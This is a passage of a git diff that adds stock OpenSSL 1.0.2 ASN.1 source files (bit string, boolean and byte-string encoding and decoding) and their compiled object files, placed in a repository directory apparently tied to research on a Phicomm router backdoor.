+    while ((a->length > 0) && (a->data[a->length - 1] == 0))
+        a->length--;
+    return (1);
+}
+
+int ASN1_BIT_STRING_get_bit(ASN1_BIT_STRING *a, int n)
+{
+    int w, v;
+
+    w = n / 8;
+    v = 1 << (7 - (n & 0x07));
+    if ((a == NULL) || (a->length < (w + 1)) || (a->data == NULL))
+        return (0);
+    return ((a->data[w] & v) != 0);
+}
+
+/*
+ * Checks if the given bit string contains only bits specified by
+ * the flags vector. Returns 0 if there is at least one bit set in 'a'
+ * which is not specified in 'flags', 1 otherwise.
+ * 'len' is the length of 'flags'.
+ */
+int ASN1_BIT_STRING_check(ASN1_BIT_STRING *a,
+                          unsigned char *flags, int flags_len)
+{
+    int i, ok;
+    /* Check if there is one bit set at all. */
+    if (!a || !a->data)
+        return 1;
+
+    /*
+     * Check each byte of the internal representation of the bit string.
+     */
+    ok = 1;
+    for (i = 0; i < a->length && ok; ++i) {
+        unsigned char mask = i < flags_len ? ~flags[i] : 0xff;
+        /* We are done if there is an unneeded bit set. */
+        ok = (a->data[i] & mask) == 0;
+    }
+    return ok;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_bitstr.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_bitstr.o
new file mode 100644
index 0000000000000000000000000000000000000000..4a9a688e870b6d710943dcdca3ee8207a4e564c6
GIT binary patch
literal 3720
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
G`QHNR{IpI0

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_bool.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_bool.c
new file mode 100644
index 0000000..1b85bc9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_bool.c
@@ -0,0 +1,111 @@
+/* crypto/asn1/a_bool.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+
+int i2d_ASN1_BOOLEAN(int a, unsigned char **pp)
+{
+    int r;
+    unsigned char *p;
+
+    r = ASN1_object_size(0, 1, V_ASN1_BOOLEAN);
+    if (pp == NULL)
+        return (r);
+    p = *pp;
+
+    ASN1_put_object(&p, 0, 1, V_ASN1_BOOLEAN, V_ASN1_UNIVERSAL);
+    *(p++) = (unsigned char)a;
+    *pp = p;
+    return (r);
+}
+
+int d2i_ASN1_BOOLEAN(int *a, const unsigned char **pp, long length)
+{
+    int ret = -1;
+    const unsigned char *p;
+    long len;
+    int inf, tag, xclass;
+    int i = 0;
+
+    p = *pp;
+    inf = ASN1_get_object(&p, &len, &tag, &xclass, length);
+    if (inf & 0x80) {
+        i = ASN1_R_BAD_OBJECT_HEADER;
+        goto err;
+    }
+
+    if (tag != V_ASN1_BOOLEAN) {
+        i = ASN1_R_EXPECTING_A_BOOLEAN;
+        goto err;
+    }
+
+    if (len != 1) {
+        i = ASN1_R_BOOLEAN_IS_WRONG_LENGTH;
+        goto err;
+    }
+    ret = (int)*(p++);
+    if (a != NULL)
+        (*a) = ret;
+    *pp = p;
+    return (ret);
+ err:
+    ASN1err(ASN1_F_D2I_ASN1_BOOLEAN, i);
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_bool.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_bool.o
new file mode 100644
index 0000000000000000000000000000000000000000..85566fbe8d26c20a914b2c76aca72a7a132b7f38
GIT binary patch
literal 2280
zcmbuAO>7fa5P;u$9dO&Q*|r=kfhr#s<hIGm8<5%}RC!I-ennP-66XZb%0C;Dki?O_
zD+Po~C6}L-2_R0KIdSd*K@JcJ4sfW%u~ILnmsX-ZR7gEkMd{4j_mbz0eQ8H}o|(@x
z^Jd@Mv9CDgVnR`f5QThAc0EA}c`&qV=b4!&2gopaJMzijc4ZS&X2W;Z_6!Z*K0%Lm
ze%Bkcn>><5C!8=+*4A&BXot_~)t~+2w5zf-8vg27TaPiv`iq81gGE86K{w7QG(2eJ
zZ)BMps<aDr8uVCH)gOvNJJ0or@b%d_``j~ZXZD-$6%F5EC(uN;r-`(+MZ5dxM%hTx
z@E5w_8#>*%Y@}F&tlER`g3-=NLkY%c=dz(I!6@4_>ZM|&MjjG+^$%YS9eApb-+Z<?
z4~@SW-V9I;Z7zX=$FW{MxdqnK1MtDhc3y1L?l~h3%^zk*vfF(2?A$X_I(6zqCOcaT
zR{bFJm3hp}jagp=%(cE9&zZU7pGFu8q9kGIu<%++ld~j2$QCjc7Rtd$5#`b}QPy?k
z(D44$9XR7r;D`Blw^0{0{br)5rLU=umgywRS}w7qWhS(=t?30VWk5)o$3H^tX!^B8
zNlSOsl9o^0XK}Wc;vst!UTc#4xxMEL0BYYi4Y_!V-Yk_pbuU9tCHwY5#`h24{o7U9
zY4)bP5AH`&pX|(l9fF1D9~TQiKVBHXrw8ylaNJky$Ic#@KOp}50i0CbTC=%q*2&^{
z!?kB7Ew?Z=Rd(!2;+D!&1-tA{6^k=Y#jV(dvf~mK(yT3cb>D3-Uh*Qa7Wi%iiR-rg
zYW;#+U%24TR~MH_V|=l<Fe`E1+sSaIr(G=IwOY*<^oe3dirwf3VE?lnNk!tr62BsG
z94Zn2qr^ufZs3atBIZQIpOm;<C&Qu%&JkPOC1+w>+y^n+7gzjh4Yc2i^n$Qj-g4FS
zy>*|MjjCTIX06>OX1%$x;;jN(ZTg-GGdsr4k^ARY19Pp_T=QD~MPjlF-hw;ds;+pV
zmH(wPkd2QXpOic>loCIe$ctiyjT+x~Jj*;RS=JGP+=&#ydBIX*!qS`{<vc#w*JJzg
zaB1Qqg1=i>^S|cfT;f(aSh9%yKbIlcqAj6MNK6j>K?KOKPwZ)6_-lmkmn@HXeny61
zi}Mq>1_p-4^MB&`Ya)>Ac>Wyle)pH+|Lfvh@cuAY<cs_3w>NG@c|-SjA2`eJ^~pyT
gzdJzWHHUZ6k%X7qAs>R(FaJy4|ME^`WW@9T1?CDJLI3~&

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_bytes.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_bytes.c
new file mode 100644
index 0000000..12715a7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_bytes.c
@@ -0,0 +1,306 @@
+/* crypto/asn1/a_bytes.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+
+static int asn1_collate_primitive(ASN1_STRING *a, ASN1_const_CTX *c);
+/*
+ * type is a 'bitmap' of acceptable string types.
+ */
+ASN1_STRING *d2i_ASN1_type_bytes(ASN1_STRING **a, const unsigned char **pp,
+                                 long length, int type)
+{
+    ASN1_STRING *ret = NULL;
+    const unsigned char *p;
+    unsigned char *s;
+    long len;
+    int inf, tag, xclass;
+    int i = 0;
+
+    p = *pp;
+    inf = ASN1_get_object(&p, &len, &tag, &xclass, length);
+    if (inf & 0x80)
+        goto err;
+
+    if (tag >= 32) {
+        i = ASN1_R_TAG_VALUE_TOO_HIGH;
+        goto err;
+    }
+    if (!(ASN1_tag2bit(tag) & type)) {
+        i = ASN1_R_WRONG_TYPE;
+        goto err;
+    }
+
+    /* If a bit-string, exit early */
+    if (tag == V_ASN1_BIT_STRING)
+        return (d2i_ASN1_BIT_STRING(a, pp, length));
+
+    if ((a == NULL) || ((*a) == NULL)) {
+        if ((ret = ASN1_STRING_new()) == NULL)
+            return (NULL);
+    } else
+        ret = (*a);
+
+    if (len != 0) {
+        s = (unsigned char *)OPENSSL_malloc((int)len + 1);
+        if (s == NULL) {
+            i = ERR_R_MALLOC_FAILURE;
+            goto err;
+        }
+        memcpy(s, p, (int)len);
+        s[len] = '\0';
+        p += len;
+    } else
+        s = NULL;
+
+    if (ret->data != NULL)
+        OPENSSL_free(ret->data);
+    ret->length = (int)len;
+    ret->data = s;
+    ret->type = tag;
+    if (a != NULL)
+        (*a) = ret;
+    *pp = p;
+    return (ret);
+ err:
+    ASN1err(ASN1_F_D2I_ASN1_TYPE_BYTES, i);
+    if ((ret != NULL) && ((a == NULL) || (*a != ret)))
+        ASN1_STRING_free(ret);
+    return (NULL);
+}
+
+int i2d_ASN1_bytes(ASN1_STRING *a, unsigned char **pp, int tag, int xclass)
+{
+    int ret, r, constructed;
+    unsigned char *p;
+
+    if (a == NULL)
+        return (0);
+
+    if (tag == V_ASN1_BIT_STRING)
+        return (i2d_ASN1_BIT_STRING(a, pp));
+
+    ret = a->length;
+    r = ASN1_object_size(0, ret, tag);
+    if (pp == NULL)
+        return (r);
+    p = *pp;
+
+    if ((tag == V_ASN1_SEQUENCE) || (tag == V_ASN1_SET))
+        constructed = 1;
+    else
+        constructed = 0;
+    ASN1_put_object(&p, constructed, ret, tag, xclass);
+    memcpy(p, a->data, a->length);
+    p += a->length;
+    *pp = p;
+    return (r);
+}
+
+ASN1_STRING *d2i_ASN1_bytes(ASN1_STRING **a, const unsigned char **pp,
+                            long length, int Ptag, int Pclass)
+{
+    ASN1_STRING *ret = NULL;
+    const unsigned char *p;
+    unsigned char *s;
+    long len;
+    int inf, tag, xclass;
+    int i = 0;
+
+    if ((a == NULL) || ((*a) == NULL)) {
+        if ((ret = ASN1_STRING_new()) == NULL)
+            return (NULL);
+    } else
+        ret = (*a);
+
+    p = *pp;
+    inf = ASN1_get_object(&p, &len, &tag, &xclass, length);
+    if (inf & 0x80) {
+        i = ASN1_R_BAD_OBJECT_HEADER;
+        goto err;
+    }
+
+    if (tag != Ptag) {
+        i = ASN1_R_WRONG_TAG;
+        goto err;
+    }
+
+    if (inf & V_ASN1_CONSTRUCTED) {
+        ASN1_const_CTX c;
+
+        c.pp = pp;
+        c.p = p;
+        c.inf = inf;
+        c.slen = len;
+        c.tag = Ptag;
+        c.xclass = Pclass;
+        c.max = (length == 0) ? 0 : (p + length);
+        if (!asn1_collate_primitive(ret, &c))
+            goto err;
+        else {
+            p = c.p;
+        }
+    } else {
+        if (len != 0) {
+            if ((ret->length < len) || (ret->data == NULL)) {
+                if (ret->data != NULL)
+                    OPENSSL_free(ret->data);
+                s = (unsigned char *)OPENSSL_malloc((int)len + 1);
+                if (s == NULL) {
+                    i = ERR_R_MALLOC_FAILURE;
+                    goto err;
+                }
+            } else
+                s = ret->data;
+            memcpy(s, p, (int)len);
+            s[len] = '\0';
+            p += len;
+        } else {
+            s = NULL;
+            if (ret->data != NULL)
+                OPENSSL_free(ret->data);
+        }
+
+        ret->length = (int)len;
+        ret->data = s;
+        ret->type = Ptag;
+    }
+
+    if (a != NULL)
+        (*a) = ret;
+    *pp = p;
+    return (ret);
+ err:
+    if ((ret != NULL) && ((a == NULL) || (*a != ret)))
+        ASN1_STRING_free(ret);
+    ASN1err(ASN1_F_D2I_ASN1_BYTES, i);
+    return (NULL);
+}
+
+/*
+ * We are about to parse 0..n d2i_ASN1_bytes objects, we are to collapse them
+ * into the one structure that is then returned
+ */
+/*
+ * There have been a few bug fixes for this function from Paul Keogh
+ * <paul.keogh@sse.ie>, many thanks to him
+ */
+static int asn1_collate_primitive(ASN1_STRING *a, ASN1_const_CTX *c)
+{
+    ASN1_STRING *os = NULL;
+    BUF_MEM b;
+    int num;
+
+    b.length = 0;
+    b.max = 0;
+    b.data = NULL;
+
+    if (a == NULL) {
+        c->error = ERR_R_PASSED_NULL_PARAMETER;
+        goto err;
+    }
+
+    num = 0;
+    for (;;) {
+        if (c->inf & 1) {
+            c->eos = ASN1_const_check_infinite_end(&c->p,
+                                                   (long)(c->max - c->p));
+            if (c->eos)
+                break;
+        } else {
+            if (c->slen <= 0)
+                break;
+        }
+
+        c->q = c->p;
+        if (d2i_ASN1_bytes(&os, &c->p, c->max - c->p, c->tag, c->xclass)
+            == NULL) {
+            c->error = ERR_R_ASN1_LIB;
+            goto err;
+        }
+
+        if (!BUF_MEM_grow_clean(&b, num + os->length)) {
+            c->error = ERR_R_BUF_LIB;
+            goto err;
+        }
+        memcpy(&(b.data[num]), os->data, os->length);
+        if (!(c->inf & 1))
+            c->slen -= (c->p - c->q);
+        num += os->length;
+    }
+
+    if (!asn1_const_Finish(c))
+        goto err;
+
+    a->length = num;
+    if (a->data != NULL)
+        OPENSSL_free(a->data);
+    a->data = (unsigned char *)b.data;
+    if (os != NULL)
+        ASN1_STRING_free(os);
+    return (1);
+ err:
+    ASN1err(ASN1_F_ASN1_COLLATE_PRIMITIVE, c->error);
+    if (os != NULL)
+        ASN1_STRING_free(os);
+    if (b.data != NULL)
+        OPENSSL_free(b.data);
+    return (0);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_bytes.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_bytes.o
new file mode 100644
index 0000000000000000000000000000000000000000..a146768f9bcb67c3fbf57171f979637ee4845e30
GIT binary patch
literal 4784
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_d2i_fp.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_d2i_fp.c
new file mode 100644
index 0000000..a1864b4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_d2i_fp.c
@@ -0,0 +1,268 @@
+/* crypto/asn1/a_d2i_fp.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
